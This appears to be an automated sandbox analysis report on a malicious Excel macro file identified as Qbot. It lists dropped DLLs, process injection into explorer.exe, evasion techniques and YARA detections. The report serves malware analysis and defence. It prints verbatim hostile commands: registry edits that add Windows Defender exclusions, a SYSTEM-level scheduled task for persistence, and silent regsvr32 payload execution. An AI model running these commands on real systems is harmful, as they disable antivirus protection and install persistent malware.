Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,	13_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,	13_2_1000CB77

Source: Drezd.red.14.dr	Static PE information: No import functions for PE file found
Source: Drezd.red.7.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\SysWOW64\explorer.exe

Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ofsugluhreiu' /d '0'

Source: xls.xls

OLE indicator, VBA macros: true

Source: Joe Sandbox View

Dropped File: C:\Users\user\Drezd.red 17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: xls.xls

Virustotal: Detection: 30%

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ......................(..........&R.....(.P.....................P.........................................................................(.....	Jump to behavior
Source: C:\Windows\System32\reg.exe	Console Write: ................P...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........(.%.....N.......(...............	Jump to behavior
Source: C:\Windows\System32\reg.exe	Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........x.......N.......(...............	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ofsugluhreiu' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Csbfke' /d '0'
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ofsugluhreiu' /d '0'	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Csbfke' /d '0'	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Application Data\Microsoft\Forms

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREB76.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@25/6@0/3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,

6_2_1000D523

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 13_2_100030B7 StartServiceCtrlDispatcherA,

13_2_100030B7

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 13_2_100030B7 StartServiceCtrlDispatcherA,

13_2_100030B7

Source: xls.xls

OLE indicator, Workbook stream: true

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,

6_2_1000ABA3

Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{E2FE3E6D-C1F8-4CA3-893D-519B96E24CEA}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \BaseNamedObjects\{5AAEC833-6C77-49D4-9B40-99D59FAADF51}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{E2FE3E6D-C1F8-4CA3-893D-519B96E24CEA}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \BaseNamedObjects\{85FB811B-425C-42D1-AD62-706F36D732CD}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{5AAEC833-6C77-49D4-9B40-99D59FAADF51}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \BaseNamedObjects\Global\{85FB811B-425C-42D1-AD62-706F36D732CD}

Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.622662373.0000000002781000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_0019242A push 00000000h; mov dword ptr [esp], esi	6_2_0019276D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_0019242A push 00000000h; mov dword ptr [esp], edi	6_2_0019288F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_0019242A push 00000000h; mov dword ptr [esp], ebx	6_2_001928C3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_0019242A push 00000000h; mov dword ptr [esp], edi	6_2_00192B65
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191424 push 00000000h; mov dword ptr [esp], ecx	6_2_00191460
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191424 push 00000000h; mov dword ptr [esp], ecx	6_2_0019159D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00193726 push 00000000h; mov dword ptr [esp], ebp	6_2_0019376E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00193726 push 00000000h; mov dword ptr [esp], edx	6_2_00193A0E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00193726 push 00000000h; mov dword ptr [esp], esi	6_2_00193B55
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00193726 push esi; mov dword ptr [esp], 00000001h	6_2_00193D71
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00193726 push 00000000h; mov dword ptr [esp], ecx	6_2_00193D9C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00193726 push 00000000h; mov dword ptr [esp], ebp	6_2_00193E46
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00193726 push 00000000h; mov dword ptr [esp], esi	6_2_00193E72
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00193726 push 00000000h; mov dword ptr [esp], esi	6_2_00193F52
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00193726 push 00000000h; mov dword ptr [esp], ebp	6_2_00193F76
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00192C41 push 00000000h; mov dword ptr [esp], esi	6_2_00192D71
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00192C41 push 00000000h; mov dword ptr [esp], esi	6_2_00192E73
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00192C41 push 00000000h; mov dword ptr [esp], esi	6_2_0019336F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00192C41 push 00000000h; mov dword ptr [esp], ebp	6_2_001933F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00192C41 push edi; mov dword ptr [esp], 00000004h	6_2_0019340B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00192C41 push 00000000h; mov dword ptr [esp], edx	6_2_0019346C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191D89 push 00000000h; mov dword ptr [esp], ebp	6_2_00191DAF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191D89 push 00000000h; mov dword ptr [esp], ebp	6_2_00191F4B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191D89 push 00000000h; mov dword ptr [esp], ebp	6_2_0019223C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191D89 push 00000000h; mov dword ptr [esp], ebx	6_2_001923A2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191D89 push 00000000h; mov dword ptr [esp], ebp	6_2_00192400
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191000 push 00000000h; mov dword ptr [esp], ecx	6_2_001910E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191000 push 00000000h; mov dword ptr [esp], edx	6_2_0019112A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191000 push 00000000h; mov dword ptr [esp], ecx	6_2_0019127C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191000 push edx; mov dword ptr [esp], 000FFFFFh	6_2_0019133C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191000 push 00000000h; mov dword ptr [esp], esi	6_2_00191356

Source: 44467.7495993056[1].dat.0.dr	Static PE information: section name: .rdatat
Source: 44467.7495993056[1].dat.0.dr	Static PE information: section name:
Source: 44467.7495993056[1].dat.0.dr	Static PE information: section name:
Source: 44467.7495993056[1].dat.0.dr	Static PE information: section name:
Source: Drezd.red.0.dr	Static PE information: section name: .rdatat
Source: Drezd.red.0.dr	Static PE information: section name:
Source: Drezd.red.0.dr	Static PE information: section name:
Source: Drezd.red.0.dr	Static PE information: section name:
Source: Drezd.red.7.dr	Static PE information: section name: .rdatat
Source: Drezd.red.7.dr	Static PE information: section name:
Source: Drezd.red.7.dr	Static PE information: section name:
Source: Drezd.red.7.dr	Static PE information: section name:
Source: Drezd.red.14.dr	Static PE information: section name: .rdatat
Source: Drezd.red.14.dr	Static PE information: section name:
Source: Drezd.red.14.dr	Static PE information: section name:
Source: Drezd.red.14.dr	Static PE information: section name:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_1000DFAD LoadLibraryA,GetProcAddress,

6_2_1000DFAD

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd.red	Jump to dropped file

Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd.red			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.7495993056[1].dat			Jump to dropped file

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\Drezd.red

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\Drezd.red

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\SysWOW64\explorer.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 13_2_100030B7 StartServiceCtrlDispatcherA,

13_2_100030B7

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 1016 base: 44102D value: E9 BA 4C C4 FF			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 3016 base: 44102D value: E9 BA 4C C8 FF			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1160	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1592	Thread sleep time: -104000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2420	Thread sleep count: 44 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1904	Thread sleep count: 79 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1904	Thread sleep time: -88000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_6-12816

Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.7495993056[1].dat

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_6-11431
Source: C:\Windows\SysWOW64\explorer.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,

6_2_1000D01F

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW,	6_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0008AEB4 FindFirstFileW,FindNextFileW,	7_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,	13_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW,	14_2_000CAEB4

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,

6_2_10005F82

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_1000DFAD LoadLibraryA,GetProcAddress,

6_2_1000DFAD

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00194495 or ebx, dword ptr fs:[00000030h]		6_2_00194495
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001A4495 or ebx, dword ptr fs:[00000030h]		13_2_001A4495

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_00085A61 RtlAddVectoredExceptionHandler,		7_2_00085A61
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_000C5A61 RtlAddVectoredExceptionHandler,		14_2_000C5A61

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 44102D	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F0000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 44102D	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write			Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 1016 base: B0000 value: 9C	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 1016 base: 44102D value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 3016 base: F0000 value: 9C	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 3016 base: 44102D value: E9	Jump to behavior

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match

File source: xls.xls, type: SAMPLE

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ofsugluhreiu' /d '0'	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Csbfke' /d '0'	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'	Jump to behavior

Source: explorer.exe, 00000007.00000002.888554207.0000000000C30000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.888554207.0000000000C30000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000007.00000002.888554207.0000000000C30000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 7_2_000831C2 CreateNamedPipeA,

7_2_000831C2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

6_2_1000980C

Source: C:\Windows\SysWOW64\regsvr32.exe

6_2_1000D01F

Stealing of Sensitive Information:

Yara detected Qbot

Show sources

Source: Yara match	File source: 7.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorer.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorer.exe.c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.635284743.0000000000300000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.619249193.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
